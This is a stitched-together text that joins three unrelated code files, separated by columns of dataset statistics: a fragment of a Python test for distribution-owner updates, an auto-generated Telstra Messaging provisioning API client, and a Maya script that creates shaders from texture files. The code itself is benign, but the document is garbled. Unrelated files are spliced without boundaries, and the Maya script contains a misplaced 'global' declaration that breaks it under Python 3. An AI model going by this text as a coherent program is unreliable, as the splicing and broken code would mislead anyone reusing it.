        self._assert_owner_count(session_cookie, nbDistributionOwner + 1)
        # update rejected on duplicate email
        result, code = self._put_owner(auth, newDO, {"email":distributionOwnerList[0]['email']})
        self.assertEqual(code, 500)
        # update rejected on duplicate telephone
        result, code = self._put_owner(auth, newDO, {"telephone":distributionOwnerList[0]['telephone']})
        self.assertEqual(code, 500)
| 56.267045
| 235
| 0.599111
| 966
| 9,903
| 6.015528
| 0.132505
| 0.064361
| 0.093616
| 0.101187
| 0.832043
| 0.822062
| 0.798486
| 0.791774
| 0.789365
| 0.777663
| 0
| 0.017711
| 0.270221
| 9,903
| 175
| 236
| 56.588571
| 0.786357
| 0.090478
| 0
| 0.728682
| 0
| 0
| 0.147072
| 0
| 0
| 0
| 0
| 0
| 0.24031
| 1
| 0.031008
| false
| 0.03876
| 0.046512
| 0
| 0.085271
| 0.007752
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d65eb6e6529d9fa8e21a1ac7031798142e260aec
| 16,953
|
py
|
Python
|
Telstra_Messaging/api/provisioning_api.py
|
telstra/MessagingAPI-SDK-python
|
1f9413a7f43321c84056ce54bc1ac3d626b6bbe2
|
[
"Apache-2.0"
] | 21
|
2017-11-08T04:06:26.000Z
|
2021-01-21T04:58:36.000Z
|
Telstra_Messaging/api/provisioning_api.py
|
telstra/MessagingAPI-SDK-python
|
1f9413a7f43321c84056ce54bc1ac3d626b6bbe2
|
[
"Apache-2.0"
] | 5
|
2017-11-28T17:23:29.000Z
|
2021-10-15T11:11:48.000Z
|
Telstra_Messaging/api/provisioning_api.py
|
telstra/MessagingAPI-SDK-python
|
1f9413a7f43321c84056ce54bc1ac3d626b6bbe2
|
[
"Apache-2.0"
] | 2
|
2020-01-13T04:34:27.000Z
|
2021-08-10T04:10:26.000Z
|
# coding: utf-8
"""
Telstra Messaging API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.2.10
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from Telstra_Messaging.api_client import ApiClient
from Telstra_Messaging.exceptions import (
ApiTypeError,
ApiValueError
)
class ProvisioningApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
    def __init__(self, api_client=None):
        """Create the provisioning API facade.

        :param api_client: optional pre-configured ApiClient instance;
            when None, a default ApiClient() is constructed.
        """
        if api_client is None:
            # Build a default client so callers that need no special
            # configuration do not have to construct one themselves.
            api_client = ApiClient()
        self.api_client = api_client
def create_subscription(self, body, **kwargs): # noqa: E501
"""Create Subscription # noqa: E501
Invoke the provisioning API to get a dedicated mobile number for an account or application. Note that Free Trial apps will have a 30-Day Limit for their provisioned number. If the Provisioning call is made several times within that 30-Day period, it will return the `expiryDate` in the Unix format and will not add any activeDays until after that `expiryDate`. After the `expiryDate`, you may make another Provisioning call to extend the activeDays by another 30-Days. For paid apps, a provisioned number can be allotted for a maximum of 5 years. If a Provisioning call is made which will result to activeDays > 1825, a 409 `Active Days Max` response will be returned to indicate that the provisioned number is already valid for more than 5 years and that no update to activeDays has been made. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_subscription(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param ProvisionNumberRequest body: A JSON payload containing the required attributes (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ProvisionNumberResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_subscription_with_http_info(body, **kwargs) # noqa: E501
def create_subscription_with_http_info(self, body, **kwargs): # noqa: E501
"""Create Subscription # noqa: E501
Invoke the provisioning API to get a dedicated mobile number for an account or application. Note that Free Trial apps will have a 30-Day Limit for their provisioned number. If the Provisioning call is made several times within that 30-Day period, it will return the `expiryDate` in the Unix format and will not add any activeDays until after that `expiryDate`. After the `expiryDate`, you may make another Provisioning call to extend the activeDays by another 30-Days. For paid apps, a provisioned number can be allotted for a maximum of 5 years. If a Provisioning call is made which will result to activeDays > 1825, a 409 `Active Days Max` response will be returned to indicate that the provisioned number is already valid for more than 5 years and that no update to activeDays has been made. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_subscription_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param ProvisionNumberRequest body: A JSON payload containing the required attributes (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ProvisionNumberResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['auth'] # noqa: E501
return self.api_client.call_api(
'/messages/provisioning/subscriptions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProvisionNumberResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_subscription(self, body, **kwargs): # noqa: E501
"""Delete Subscription # noqa: E501
Delete a mobile number subscription from an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_subscription(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param DeleteNumberRequest body: EmptyArr (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_subscription_with_http_info(body, **kwargs) # noqa: E501
def delete_subscription_with_http_info(self, body, **kwargs): # noqa: E501
"""Delete Subscription # noqa: E501
Delete a mobile number subscription from an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_subscription_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param DeleteNumberRequest body: EmptyArr (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `delete_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['auth'] # noqa: E501
return self.api_client.call_api(
'/messages/provisioning/subscriptions', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_subscription(self, **kwargs): # noqa: E501
"""Get Subscription # noqa: E501
Get mobile number subscription for an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subscription(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GetSubscriptionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_subscription_with_http_info(**kwargs) # noqa: E501
def get_subscription_with_http_info(self, **kwargs): # noqa: E501
"""Get Subscription # noqa: E501
Get mobile number subscription for an account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subscription_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GetSubscriptionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['auth'] # noqa: E501
return self.api_client.call_api(
'/messages/provisioning/subscriptions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetSubscriptionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.354749
| 819
| 0.62284
| 1,944
| 16,953
| 5.229424
| 0.119342
| 0.036199
| 0.044068
| 0.026559
| 0.918454
| 0.910781
| 0.90724
| 0.90724
| 0.90724
| 0.893665
| 0
| 0.015724
| 0.309739
| 16,953
| 357
| 820
| 47.487395
| 0.853017
| 0.51979
| 0
| 0.75974
| 1
| 0
| 0.161028
| 0.055314
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.032468
| 0
| 0.123377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d66ea6dfd614428f764d25f8a5a861def016b66c
| 199,620
|
py
|
Python
|
Automatic_Materials.py
|
mfischer3d/Automatic_Materials
|
9a4de747443c1f22e022857f809321c9ac2ec0cd
|
[
"CC0-1.0"
] | null | null | null |
Automatic_Materials.py
|
mfischer3d/Automatic_Materials
|
9a4de747443c1f22e022857f809321c9ac2ec0cd
|
[
"CC0-1.0"
] | null | null | null |
Automatic_Materials.py
|
mfischer3d/Automatic_Materials
|
9a4de747443c1f22e022857f809321c9ac2ec0cd
|
[
"CC0-1.0"
] | null | null | null |
""" Automatic Materials 1.1 Created by Michael Fischer
This script imports the images from your projects sourceimages folder,
creates a shader for each material and connects them based off of the file names.
Non-color maps are set to the Raw color space with "ignore color space file rules" enabled, and normal maps are wired through bump2d / RedshiftNormalMap nodes.
--- USER ADJUSTMENT INSTRUCTIONS ---
Change the default_shader to change the shader the script creates. ex: default_shader = redshift (NO QUOTES)
Change the project_is_set to False to select a file folder instead of the automatic sourceimages folder.
Change object_material_connect to False to disable auto assigning objects to materials based off their names.
Change the image names inside the quotes if you named your files differently. ex: color_text = 'col'
Save the python file to save your settings for next time and add to shelf or a hotkey for easier access.
"""
import maya.cmds as cmds
import maya.mel as mel
# ---- Shader node-type registry ---------------------------------------------
arnold = 'aiStandardSurface'
blinn = 'blinn'
phong = 'phong'
redshift = 'RedshiftMaterial'
lambert = 'lambert'
# Redshift BRDF indices.
Beckmann = 0
GGX = 1
Ashikhmin = 2
# CHANGE YOUR DEFAULT SHADER HERE
default_shader = redshift  # Pick any shader variable above (no quotes).
# ---- User-adjustable settings ----------------------------------------------
project_is_set = True  # True: search the project's sourceimages. False: user picks a folder.
object_material_connect = True  # True: auto-assign materials to matching object names.
default_project_image_directory = 'sourceimages'  # Folder name inside the set project.
bumpDepth_def = 0.150  # Default bump depth for normal maps.
material_suffix = '_mat'  # Suffix added to created shaders when the map name has none.
object_suffix = '_low'  # Object-name suffix ignored when matching objects to shaders.
default_BRDF = GGX  # For Redshift pick from Beckmann, GGX or Ashikhmin.
# ---- Image-name tokens (suffixes searched for in file names) ----------------
# e.g. arm_material_Base_Color is matched by color_text.
color_text = 'Color'
color_alt_text = 'Diffuse'
color_alt2_text = 'Albedo'
roughness_text = 'Roughness'
roughness_alt_text = 'Glossiness'
metal_text = "Metal"
metal_alt_text = 'Reflection'
normal_text = 'Normal'  # With two normal maps per material, the first found wins (OpenGL, DirectX, Normal).
emissive_text = 'Emissive'
scatter_text = 'Scattering'
opacity_text = 'Opacity'  # 'opacity' is also already searched for.
opacity_alt_text = 'Alpha'
ior_text = 'IOR'  # 'IOR' and 'Ior' are also already searched for.
translucency_text = 'Translucency'
# ---- Module-level working state ---------------------------------------------
dir_total = []
shaders_list = [arnold, blinn, phong, redshift, lambert]
shaders_color_list = ['.baseColor', '.color', '.color', '.diffuse_color', '.color']
node_list = ['RedshiftNormalMap', 'RedshiftPostEffects', 'bump2d']
all_nodes_list = shaders_list + node_list
counter = 0
number_of_shaders = len(shaders_list)
default_shadingEngine = 'aiStandardSurface*SG'
basePath = cmds.workspace(q = True, rd = True)
basePath = basePath + default_project_image_directory
# Placeholder globals that the runtime code rebinds via `global`.
i = 'test'
b = 'test'
runit = False
obj_shad_name = 'testt'
# Bug fix: raw string. The original literal relied on invalid escape
# sequences ('\P', '\A', '\s', ...) that only happen to pass through
# verbatim (and warn on Python 3.6+); the value is unchanged.
default_pano = r"C:\Program Files\Allegorithmic\Substance Painter\resources\shelf\allegorithmic\environments\Exterior\Panorama.hdr"
ui = True  # True or False if you want the ui window or not.
# Map the chosen shader type to its shading-group name pattern.
if default_shader == arnold:
    default_shadingEngine = 'aiStandardSurface*SG'
if default_shader == blinn:
    default_shadingEngine = 'blinn*SG'
if default_shader == phong:
    default_shadingEngine = 'phong*SG'
if default_shader == redshift:
    default_shadingEngine = 'rsMaterial*SG'
if default_shader == lambert:
    default_shadingEngine = 'lambert*SG'
def color_space():
    """Mark the current file node (global ``i``) as non-color data.

    Turns on 'ignoreColorSpaceFileRules' and forces the node's color
    space ('.cs') to 'Raw'.
    """
    node = i  # current file node name, bound by the caller's loop
    cmds.setAttr(node + '.ignoreColorSpaceFileRules', 1)
    cmds.setAttr(node + '.cs', 'Raw', type='string')
def color_func(a = '.color'):
    """Plug file node ``i`` (outColor) into ``selected_shader + a``,
    first dropping the prior connection recorded in global ``connected_1``."""
    try:
        cmds.disconnectAttr(connected_1[0] + '.outColor', selected_shader + a)
    except:
        # Nothing was connected (connected_1 is None) -- ignore.
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader + a)

def color_func2(a = '.color'):
    """Like color_func but targets ``selected_shader2``; looks up the existing
    connection itself via ``my_array[0]`` (a global set elsewhere in the file)."""
    try:
        connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
        cmds.disconnectAttr(connect_1[0] + '.outColor', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader2 + a)

def roughness_func(a = '.specularRoughness'):
    """Connect ``i``'s scalar output (outAlpha) to the roughness plug of
    ``selected_shader`` and mark the image as non-color via color_space()."""
    try:
        cmds.disconnectAttr(connected_2[0] + '.outAlpha', selected_shader + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader + a)
        color_space()

def roughness_func2(a = '.specularRoughness'):
    """roughness_func for ``selected_shader2``; prior link comes from global
    ``connect_2``."""
    try:
        cmds.disconnectAttr(connect_2[0] + '.outAlpha', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader2 + a)
        color_space()

def metal_func(a = '.reflectivity'):
    """Connect ``i``'s outAlpha to the metal/reflectivity plug of
    ``selected_shader`` (non-color data)."""
    try:
        cmds.disconnectAttr(connected_3[0] + '.outAlpha', selected_shader + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader + a)
        color_space()

def metal_func2(a = '.reflectivity'):
    """metal_func for ``selected_shader2`` (prior link in ``connect_3``)."""
    try:
        cmds.disconnectAttr(connect_3[0] + '.outAlpha', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader2 + a)
        color_space()
def normal_func(a = '.normalCamera', b = 'bump2d'):
    """Wire normal-map file node ``i`` into ``selected_shader + a`` through a
    freshly created bump node of type ``b`` (depth set to ``bumpDepth_def``).

    Bug fix: the original ``cmds.delete(connected_4)[0]`` deleted every node in
    ``connected_4`` and then subscripted delete's return value -- always an
    error, silently swallowed by the bare except. Only the node that was just
    disconnected should be deleted.
    """
    bump = cmds.shadingNode(b, asUtility = True)
    try:
        cmds.disconnectAttr(connected_4[0] + '.outNormal', selected_shader + a)
        cmds.delete(connected_4[0])  # was: cmds.delete(connected_4)[0]
    except:
        # No prior bump connection -- nothing to tear down.
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', bump + '.bumpValue')
        cmds.connectAttr(bump + '.outNormal', selected_shader + a)
        cmds.setAttr(bump + '.bumpDepth', bumpDepth_def)
        color_space()
def normal_func2(a = '.normalCamera', b = 'bump2d'):
    """normal_func for ``selected_shader2``; the prior connection is tracked in
    global ``connect_4``.

    Bug fixes: the original deleted ``connected_4`` (the tracker for
    ``selected_shader``, not this shader) and subscripted delete's return
    value (``cmds.delete(connected_4)[0]``) -- both errors were hidden by the
    bare except. Delete only the node that was just disconnected.
    """
    bump = cmds.shadingNode(b, asUtility = True)
    try:
        cmds.disconnectAttr(connect_4[0] + '.outNormal', selected_shader2 + a)
        cmds.delete(connect_4[0])  # was: cmds.delete(connected_4)[0]
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', bump + '.bumpValue')
        cmds.connectAttr(bump + '.outNormal', selected_shader2 + a)
        cmds.setAttr(bump + '.bumpDepth', bumpDepth_def)
        color_space()
def rs_normal_func(a = '.bump_input'):
    """Redshift normal hookup: create a RedshiftNormalMap node, point its
    ``tex0`` at the same image file as node ``i``, and connect it to
    ``selected_shader + a``.

    Bug fix: the final connectAttr hard-coded '.bump_input' and ignored the
    ``a`` parameter; behaviour is identical for the default value but the
    parameter now works.
    """
    bump2 = cmds.shadingNode('RedshiftNormalMap', asUtility = True)
    try:
        cmds.disconnectAttr(connected_4[0] + '.outDisplacementVector', selected_shader + a)
        cmds.disconnectAttr(connected_4[0] + '.outNormal', selected_shader + a)
    except:
        pass
    finally:
        fileNode = cmds.listConnections(i)
        # NOTE(review): getAttr's extra positional argument looks suspect --
        # getAttr normally takes plug names only; confirm fileNode[0] is needed.
        currentFile = cmds.getAttr(i + ".fileTextureName", fileNode[0])
        cmds.setAttr(bump2 + '.tex0', currentFile, type="string")
        cmds.connectAttr(bump2 + '.outDisplacementVector', selected_shader + a)
def rs_normal_func2(a = '.bump_input'):
    """rs_normal_func for ``selected_shader2``; the prior connection is tracked
    in global ``connect_4``.

    Bug fix: honour the ``a`` parameter in the final connectAttr instead of the
    hard-coded '.bump_input' (identical behaviour for the default value).
    """
    bump2 = cmds.shadingNode('RedshiftNormalMap', asUtility = True)
    try:
        cmds.disconnectAttr(connect_4[0] + '.outDisplacementVector', selected_shader2 + a)
        cmds.disconnectAttr(connect_4[0] + '.outNormal', selected_shader2 + a)
    except:
        pass
    finally:
        fileNode = cmds.listConnections(i)
        # NOTE(review): see rs_normal_func -- verify this getAttr call form.
        currentFile = cmds.getAttr(i + ".fileTextureName", fileNode[0])
        cmds.setAttr(bump2 + '.tex0', currentFile, type="string")
        cmds.connectAttr(bump2 + '.outDisplacementVector', selected_shader2 + a)
def vr_normal_func(a = '.bumpMap'):
    """Bump-map hookup variant: file node ``i``'s outColor goes straight into
    ``selected_shader + a``; the image is then flagged as Raw."""
    try:
        cmds.disconnectAttr(connected_4[0] + '.outColor', selected_shader + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader + a)
        color_space()

def vr_normal_func2(a = '.bumpMap'):
    """vr_normal_func for ``selected_shader2`` (prior link in ``connect_4``)."""
    try:
        cmds.disconnectAttr(connect_4[0] + '.outColor', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader2 + a)
        color_space()
def scatter_func(a = '.subsurface'):
    """Connect ``i``'s outAlpha to the subsurface plug of ``selected_shader``
    (scalar map, so color_space() marks it Raw).

    Bug fix: disconnect the link recorded for ``selected_shader``
    (``connected_5``). The original read ``connect_5``, which tracks
    ``selected_shader2``; every other ``*_func`` sibling uses ``connected_N``.
    """
    try:
        cmds.disconnectAttr(connected_5[0] + '.outAlpha', selected_shader + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader + a)
        color_space()
def scatter_func2(a = '.subsurface'):
    """Connect ``i``'s outAlpha to the subsurface plug of ``selected_shader2``
    (prior link in ``connect_5``); scalar map, so color_space() is applied."""
    try:
        cmds.disconnectAttr(connect_5[0] + '.outAlpha', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader2 + a)
        color_space()
def emissive_func(a = '.emissionColor'):
    """Connect ``i``'s outColor to the emission plug of ``selected_shader``.
    Unlike the scalar-map helpers this does NOT call color_space() -- the
    emissive map stays color-managed."""
    try:
        cmds.disconnectAttr(connected_6[0] + '.outColor', selected_shader + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader + a)

def emissive_func2(a = '.emissionColor'):
    """emissive_func for ``selected_shader2`` (prior link in ``connect_6``)."""
    try:
        cmds.disconnectAttr(connect_6[0] + '.outColor', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader2 + a)
def ior_func(a = '.thinFilmIOR'):
    """Connect ``i``'s outAlpha to an IOR plug of ``selected_shader``
    (scalar map, marked Raw via color_space())."""
    try:
        cmds.disconnectAttr(connected_7[0] + '.outAlpha', selected_shader + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader + a)
        color_space()

def ior_func2(a = '.thinFilmIOR'):
    """ior_func for ``selected_shader2`` (prior link in ``connect_7``)."""
    try:
        cmds.disconnectAttr(connect_7[0] + '.outAlpha', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outAlpha', selected_shader2 + a)
        color_space()
def opacity_func(a = '.transparency'):
    """Connect ``i``'s outColor to the opacity/transparency plug of
    ``selected_shader`` and mark the image Raw."""
    try:
        cmds.disconnectAttr(connected_8[0] + '.outColor', selected_shader + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader + a)
        color_space()

def opacity_func2(a = '.transparency'):
    """opacity_func for ``selected_shader2`` (prior link in ``connect_8``)."""
    try:
        cmds.disconnectAttr(connect_8[0] + '.outColor', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader2 + a)
        color_space()
def translucency_func2(a = '.translucency_func2'):
    """Connect ``i``'s outColor to a translucency plug of ``selected_shader2``
    (prior link in ``connect_9``).

    NOTE(review): the default plug name '.translucency_func2' looks like a
    copy/paste of the function name rather than a real shader attribute;
    callers should pass the intended plug explicitly -- confirm and fix.
    """
    try:
        cmds.disconnectAttr(connect_9[0] + '.outColor', selected_shader2 + a)
    except:
        pass
    finally:
        cmds.connectAttr(i + '.outColor', selected_shader2 + a)
        color_space()
def delete_shader(a = arnold, b = '.baseColor'):
    """Tear down the scratch shader when it ended up unused.

    Acts only when the active shader type is ``a`` and nothing was connected
    to its ``b`` plug; then both the shader and its shading group go.
    """
    if default_shader != a:
        return
    incoming = cmds.listConnections(selected_shader + b)
    if incoming == None:
        cmds.delete(selected_shader)
        cmds.delete(shadingEngine)
def arrays_func(a = 0):
    """Append every entry of the ``a``-th directory listing (global
    ``dir_array``) onto the running ``dir_total`` list; silently skips
    indices that don't exist."""
    try:
        for entry in dir_array[a]:
            dir_total.append(entry)
    except:
        pass
def shader_create_func():
    """Build a 'file' texture node for image ``i`` plus a matching
    place2dTexture, wiring all the standard UV-placement attributes.

    Relies on globals: ``i`` (image file name), ``basePath`` (search folder)
    and ``cut`` (name partition -- presumably set by the caller; verify).
    """
    place2d = cmds.shadingNode('place2dTexture', asUtility = True)
    # Node is named after the image minus its 4-char extension.
    text_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = i[:-4])
    cmds.connectAttr(place2d + '.outUV', text_file + '.uvCoord')
    # Image lives in a sub-folder named after the material prefix (cut[0]).
    cmds.setAttr(text_file + '.fileTextureName', basePath + '/' + cut[0] + '/' + i, type = 'string')
    cmds.connectAttr(place2d + '.outUvFilterSize', text_file + '.uvFilterSize')
    connections = ['rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
                   'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage']
    for c in connections:
        cmds.connectAttr(place2d + '.' + c, text_file + '.' + c)
#UI Stuff -- callbacks bound to the settings window; each rebinds module state.
def project():
    """Use the current Maya project's sourceimages folder as the search path."""
    global project_is_set
    project_is_set = True
    global basePath
    basePath = cmds.workspace(q = True, rd = True)
    basePath = basePath + default_project_image_directory
def filedirectory():
    """Let the user pick an arbitrary folder to search for images."""
    global project_is_set
    project_is_set = False
    global basePath
    basePath = cmds.fileDialog2(fileMode=2, caption="Import Folder")[0]
# Shader-choice callbacks: each selects the node type Run_shader will create.
def red():
    global default_shader
    default_shader = redshift
def arn():
    global default_shader
    default_shader = arnold
def lam():
    global default_shader
    default_shader = lambert
def pho():
    global default_shader
    default_shader = phong
def bli():
    global default_shader
    default_shader = blinn
def obj_match():
    # Enable auto-assignment of materials to objects with matching names.
    global object_material_connect
    object_material_connect = True
def obj_no_match():
    global object_material_connect
    object_material_connect = False
def suffix_func():
    # Signals Run_shader to read the material suffix from the UI text field.
    global runit
    runit = True
def Run_shader():
if default_shader == arnold:
default_shadingEngine = 'aiStandardSurface*SG'
if default_shader == blinn:
default_shadingEngine = 'blinn*SG'
if default_shader == phong:
default_shadingEngine = 'phong*SG'
if default_shader == redshift:
default_shadingEngine = 'rsMaterial*SG'
if default_shader == lambert:
default_shadingEngine = 'lambert*SG'
global material_suffix
material_suffix = '_mat'
if runit == True:
material_suffix = cmds.textField('suffix', query = True, text = True)
if material_suffix == '':
global material_suffix
material_suffix = '_mat'
directory = cmds.getFileList(folder = basePath)
for i in directory:
if '.png' in i or '.jpg' in i or '.jpeg' in i or '.tga' in i or '.tif' in i or 'raw' in i:
if cmds.objExists(i[:-4]):
pass
else:
place2d = cmds.shadingNode('place2dTexture', asUtility = True)
text_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = i[:-4])
cmds.connectAttr(place2d +'.outUV', text_file + '.uvCoord')
cmds.setAttr(text_file + '.fileTextureName', basePath + '/' + i, type = 'string')
cmds.connectAttr(place2d +'.outUvFilterSize',text_file + '.uvFilterSize')
